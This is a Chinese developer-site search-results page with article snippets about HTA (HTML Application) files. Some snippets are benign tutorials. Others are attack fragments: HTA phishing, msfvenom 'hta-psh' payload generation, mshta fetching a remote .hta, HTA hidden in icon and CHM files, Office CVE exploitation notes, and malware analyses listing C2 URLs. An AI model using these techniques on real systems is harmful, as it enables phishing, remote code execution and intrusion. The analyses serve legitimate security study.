首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Java架构师必看

    HTA的简单应用

    HTA简介:HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差别 下面是一个HTA的例子: <! 从上面的代码可以看出来,HTA与普通的网页结构差不多,所以设计出来很容易,当然HTA还有许多自己独特的属性,下面我们来看看这个文件: 1、    HTA对语法的要求比HTML还要松,甚至连<html> :) 2、    HTA的外观 可以用<HTA:Application>来设顶HTA应用程序的外观,如标题栏、边框大小等,必须放在<head>中。 <! —example3.hta--> <html> <head>     <title>第一个HTA的例子</title>     <HTA:Application         border=

    1.2K20发布于 2021-03-22
  • 来自专栏生信技能树

    HTA芯片(学徒探索任务)

    前面我提到过[HTA-2_0] Affymetrix Human Transcriptome Array 2.0芯片的分析其实挺麻烦的,首先需要搞清楚下面3个平台的差异: GPL17586 [HTA TP53基因上面的HTA芯片探针 如果具体看探针的坐标,如下: ? 可惜的是,大多数情况下,真心想用好HTA芯片数据的小伙伴并不是购买服务的人,而是想挖掘它背后价值的。 ? TAC软件 可以看到这个软件有一个探索可变剪切的模块,而且这个也的确是大量使用了HTA芯片的文章写作落脚点。 而我们的HTA芯片,也是需要摸索一个包,好像还在GitHub上面,就是EventPointer,Romero et al.

    1.1K20发布于 2020-02-20
  • 来自专栏游戏杂谈

    使用hta操作nginx停止、重启

    用.net写一个windows应用程序,还是用hta处理呢,想了一下还是使用hta写了,虽然之前用.net写过类似的windows应用程序(选择指定目录,查找这个文件夹下所有execl中每一个sheet 用.hta有个问题就是在装有360的机器上会不停的访问是否要运行此应用程序,比较讨厌~(反正我机器啥“杀毒”的软件也没装) 初步有想法: 1、读取用户的hosts文件信息,查找文件中是否配置过指定的规则 hta运行效果如下: ? 总结一下,用到的技术:php、javascript、css、hta、batch(批处理)、nginx的配置、SSI,上面记录下的是在实现那个想法时遇到的一些问题,以及如何定位问题然后解决它的。 完整的hta代码: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>

    2.2K10发布于 2018-11-15
  • 来自专栏网络安全攻防

    社工钓鱼之HTA钓鱼

    文章前言 HTA是指HTML Application,它是一种基于HTML和JavaScript的Windows应用程序格式。 HTA文件扩展名为".hta",在Windows系统中可以像其他可执行文件一样运行。 HTA文件使用Internet Explorer作为其渲染引擎并具有访问本地计算机资源的权限,因此可以执行许多强大的操作,包括读写本地文件、调用系统命令等。 由于这些功能,HTA文件也可能被恶意软件利用进行攻击。 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限

    1.1K30编辑于 2023-05-12
  • 来自专栏游戏杂谈

    hta包装为exe发布

    hta在打开的时候,有时候会被杀毒软件拦截而不给执行,更重要的一点是通常都可以右击查看源代码,里面如果涉及到域名或者其它的一些细节就很容易被其它人了解。 网络上有一些hta转exe的,类似的软件基本上都是国外的,而且要付费,从一些乱七八糟的地方下载过“破解版”的用了一下,不是很好用,对hta支持比较差,对vbs可能会好很多,既然不好用那就只好自己动手了 很简单,主要的实现过程是:将hta作为资源添加至项目中,exe启动后读取资源文件,并写入本地磁盘,然后调用mshta命令启动hta,当hta被关闭时删除该文件。 string strSystemDisk = strSystemPath.Substring(0, 1);     string strHtaPath = strSystemDisk + ":\\temp.hta strHtaPath);     }     //MessageBox.Show("hahaniu");     //Application.Run(); } exe的话就可以很方便的设定图标了,如果hta

    1.2K20发布于 2018-11-19
  • 来自专栏FreeBuf

    我有两把枪:Powershell + HTA

    银角大王 HTA hta格式,看上去一个陌生的后缀,但实际遨游网络的你天天都接触到,因为它也是网页格式的一种,类似于html/htm ,通过html语法编写内容。 HTA本来就是被设计为制作桌面程序的,所以能直接调用其他组件执行命令。 在实例hello.hta中的 <HTA:> 是HTA的一些参数设置,设置详情见之前HTA相关内容链接。 已然有了HTA的完美辅助,如果加上Powershell的暴力输出呢? hta-psh现成的format了,省时省力,那就加以利用好了。 lport=8081 -f hta-psh -o test.hta 生成的脚本内容经过base64encode加密,想学习的同学可以把base64部分还原,观察编写语法。

    2.2K80发布于 2018-02-07
  • 来自专栏Ms08067安全实验室

    利用HTA文件绕过杀软及邮件钓⻥

    0x01 基础 HTA是HTML Application的缩写,本⽂介绍HTA在内⽹渗透中的⼏种运⽤。 双击时,会弹出hta⽂件的框,有时候为了避免弹出这个框,可以在hta⽂件中添加样式: <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR 0x02 对HTA的⽂件的隐藏 由于MSHTA对不同后缀的hta⽂件处理有所差异,我们可以通过修改后缀名的⽅式来进⼀步隐藏我们的脚本。第⼀种常⻅的⽅式是将 .hta 修改为 .html 。 因此,需要做⼀些⼩优化: copy /b beauty.ico+test.hta test_with_beauty.htahta⽂件中需要加上: <HTA:APPLICATION icon="#" /b hello.chm+test.hta hello.chm 这样就实现了⽤户在点击时,在不影响原有程序的基础上执⾏我们的hta脚本。

    2.5K10发布于 2021-01-28
  • 来自专栏游戏杂谈

    hta版】获取AppStore上架后的应用版本号

    然后想了一下,觉得最简单的就是使用hta文件(它的Ajax请求可跨域^_^)。 ? 将源码本地另存为.hta后缀的文件,然后双击它就可以运行了。 head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>检测App最新版本号</title> <hta

    83320发布于 2018-11-19
  • 来自专栏FreeBuf

    CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)

    /github.com/Voulnet/CVE-2017-8759-Exploit-sample https://github.com/vysec/CVE-2017-8759 这次的攻击文件:cmd.hta exploit.txt blob.bin PS:cmd.hta中嵌入了VBS脚本,可以根据自己的需求更改内容(可以使用powershell直接下载并运行木马,也可以使用Windows中的bitsadmin 下载木马运行) 我整理的HTA文件已经处理过啦~不会有HTA的白色闪烁,以及powershell的蓝色弹框。 切记Mime设置为HTA,Launch 接着再来一次Attacks=>Web Drive-by=> HOST file ? 得到了session~ 因为修改了HTA部分,所以是不存在弹框闪烁的问题(可能会被杀软检测到),目前这个0day影响还是很大的。没有打补丁的小伙伴记得修复哦~ 动图(无弹框): ?

    1.4K100发布于 2018-02-27
  • 来自专栏全栈程序员必看

    使用mshta.exe绕过应用程序白名单(多种方法)

    使用以下命令: mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta HTA的通常文件扩展名是.htahta文件的过程。 上诉.hta文件将在文件夹hta-attack/中被创建。 进入该文件夹,通过键入以下命令查看创建的文件列表: cd hta_attack/ ls 现在您可以看到.hta文件,即launcher.hta。启动python服务器以便共享此文件。 -f hta-psh > shell.hta 执行上述命令将创建一个.hta文件,您可以利用该文件。

    2.5K20编辑于 2022-09-06
  • 来自专栏重生信息安全

    USB钓鱼几种方式总结。

    LNK将执行HTAHTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。 模板将创建一个VB代码,该代码将加载并删除“-embed”指定的文件,并用rundll32加载;-G是指生成hta文件 3.同样用macro_pack生成另外一个经过混淆的HTA payload,他将完成替换删除 如果你此时双击pic.hta,会生成wuyifan.jpg,但是此时pic.hta没有自删除 4.整合上述的两步形成一个自删除的HTA文件:打开pic.hta将AutoOpen函数名修改为AutoOpen2 删除payload.hta的vb代码的后两行(AutoOpen和Close),将pic.hta中的vb代码(除了最后两行AutoOpen和Close)复制到payload.hta的vb脚本末尾,后并添加以下代码 [rtlo]gpj.hta,此方法也适用于其他操作系统,但是打开运行的程序可能不同

    1.6K10发布于 2020-03-06
  • 来自专栏生信技能树

    HTA2.0芯片数据分析比较麻烦,我也尝试给你一些思路

    不过最近学徒问到了[HTA-2_0] Affymetrix Human Transcriptome Array 2.0芯片的事情,其实挺麻烦的,首先需要搞清楚下面3个平台的差异: GPL17586 [HTA-2_0] Affymetrix Human Transcriptome Array 2.0 [transcript (gene) version] GPL19251 [HuGene-2_ 如果是差异分析 当然了也可以直接修改我的代码,不过这个HTA2.0芯片比较麻烦的在于,基于exon和基于transcript的有一点点区别,因为基于exon理论上可以获取不同剪切体的表达量差异的,虽然实际上很少有人愿意去探索

    3.4K30发布于 2019-09-25
  • 来自专栏Java架构师必看

    探索IE浏览器窗口

    相信看完了上面那些参数,你也一定能做出一个仿IE帮助下的窗口,哈哈~~~有趣吧 三、HTA窗口 它就是最后要出场的主角啦,或许有的人对这位仁兄还不太熟悉,我简单介绍一下,HTA的全名为HTML Application ,翻译过来就是HTML应用程序,你只要简单的用.hta为扩展名保存HTML页面就算创建了一个HTA文件,下面我们就用HTA来编个窗口,将以下这段代码保存为.hta文件,然后再用浏览器打开,会发现什么? 此属性为设置HTA的名称。 BORDER属性(border) 此属性为设置为HTA的窗口边框类型,默认值为 thick。 WINDOWSTATE属性(windowState) 此属性为设置HTA窗口的初始大小,默认值为 normal。

    1.6K10发布于 2021-03-22
  • 来自专栏FreeBuf

    浅谈一下mshta在CVE-2017-11882里的命令构造

    所以在这里我就浅谈一下如何构造这个mshta命令,另外提一下hta文件在安全方面的一个应用。 mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。 mshta执行.hta文件,是以当前用户权限执行,hta文件可以随便改后缀,也可以本地或远程执行,本地执行的时候,要记得带全路径名,否则会出错。 一、HTA文件 内嵌的html文件如何去除本地安全认证呢? 这样就不会弹阻止框了,可以干坏事了,1.hta代码如下: ? 二、如何写一个高效的下载执行过杀软的hta文件? 如果是下载执行的话,哪就很弱了。 hta文件里可以自由地写vbscript代码,所以我们的思路是可以把你的木马转换成base64格式也好,转换成16进制也好再转回来,hta只是访问了一个网页而已,但是已经把木马转到本地了,具体代码1.hta

    1.6K80发布于 2018-02-26
  • 来自专栏全栈程序员必看

    使用mshta.exe绕过应用程序白名单

    今天,我们将学习有关HTA攻击的不同方法。HTA是有用且重要的攻击,因为它可以绕过应用程序白名单。 使用以下命令: mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta HTA的通常文件扩展名是.hta。 .hta文件的过程。 所述.hta文件将在文件夹hta-attack /中创建。 -f hta-psh > shell.hta 执行上述命令将创建一个.hta文件,您可以利用它来发挥自己的优势。

    1.4K30编辑于 2022-09-08
  • 来自专栏网络安全技术点滴分享

    UpdateHub RAT深度分析:一款针对加密货币钱包和企业网络的新型HTA木马

    3.1 主解码器 (_dgaily)解码用于隐藏执行窗口的HTA应用程序配置:算法: 使用滚动密钥进行XOR运算:(index * 137 + 140) & 0xFF输出: <HTA:APPLICATION 执行前: .hta文件存在执行UpdateHub RAT后: .hta文件被移除,实现自删除9.3 安全产品检测当检测到CrowdStrike Falcon时,恶意软件会修改其执行方法,使用 cmd.exe 14.3 YARA检测字符串$hta1 = "HTA:APPLICATION" ascii$sched1 = "Schedule.Service" ascii$sched2 = "GoogleTaskSystem136 UpdateHub HTA RAT — 恶意软件家族比较分析执行摘要基于广泛的研究,UpdateHub HTA RAT似乎是一个此前未报告或新出现的恶意软件家族。 基于JWT的认证: 对于基于HTA的恶意软件而言,使用JWT令牌进行C2会话认证相对复杂。

    25010编辑于 2026-03-04
  • 来自专栏FreeBuf

    OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解

    漏洞概述 FireEye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。 这时候会生成一个有test789文字内嵌对象的文档,这是双击该对象只能以rtf文件方式打开对象,并不能执行hta脚本。 再双击对象,此时虽然访问的还是1.rtf文件,但是服务器的Content-type会返回application/hta,而word就以hta脚本的方式打开文件: ? 此时无需用户交互就可直接运行hta脚本弹出计算器: ? 关键点在于objupdate,这个标签的作用是可以自动更新对象,因此无需用户交互。 此时已经可以达到通过hta脚本执行任意代码的目的,至于hta脚本就是八仙过海各显神通了。

    1.6K90发布于 2018-02-24
  • 来自专栏FreeBuf

    Quantum 构建工具使用新的 TTP 投递 Agent Tesla

    【执行混淆代码】 【通过 MSHTA 执行远程服务器上的 HTA 文件】 HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。 通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA 文件。 【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。 生成工具 HTA 生成工具如下所示: 【HTA 生成工具】 用户输入传递给 HTA Builder 函数以构造 HTA 文件,如下所示: 【HTA 生成工具】 将此代码与之前分析的 HTA 代码比较 filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta 179[.]43[.]175[.]187/puao/PAYMENT[.]hta 179[.]43[.]175

    2K20编辑于 2022-11-14
  • 来自专栏FreeBuf

    疑似响尾蛇APT组织利用冠状病毒相关信息传播恶意lnk文件

    进入anyrun可见该样本是一个hta文件,且其标题与lnk文件相同,且其网络行为中的域名也与lnk文件后续域名相同。因此可判定该样本即为lnk文件后续 ? 下载后续Hta执行。 Hta文件内容如下 ? 该hta主要功能为解密加载一个.netdll. ? ? 解密出dll后,获取杀软信息 ? 加载dll,传入四个参数,分别是后续hta地址,传杀软信息的ur+杀软信息,诱饵pdf的内容,诱饵pdf的文件名 ? 之后该dll将释放诱饵文件,诱饵内容与巴基斯坦军队抗击疫情相关 ? ‘将再次从远程下载一个hta文件执行,但该链接目前又失效了,继续anyrun大法下载。 ? 下载回来的hta与之前的类似,仍是解密加载一个dll文件。加载后调用dll的work函数 ?

    1.1K20发布于 2020-05-14
  • 来自专栏信安之路

    CVE-2017-11882复现及防御

    既然能够实现弹出,那我们可以构造执行 powershell 直接获取 msf 会话 深入利用 在利用前,先了解一下 htahta 文件使用 HTML 格式,它的程序码可以像 HTML 一样被编辑和检查 在 hta 文件中 VBScript 和 JavaScript 的程序码可以任意混合。HTA 虽然用 HTML、JS 和 CSS 编写,却比普通网页权限大得多。 hta 本来就是被设计为桌面程序的。 1、利用 msf 生成利用的 powershell 脚本 ? ? 在复现过程中,察觉到是使用 hta 进行命令执行利用,推测攻击机作为 hta_server,然后尝试在 msf 搜索 hta,发现一个模块的实现效果跟 PS_shell 一样,接下来开始演示一下: 1、 在 msf 搜索 hta_server 模块,然后 use,设置好相关参数,exploit -j。

    1.2K00发布于 2018-08-08
领券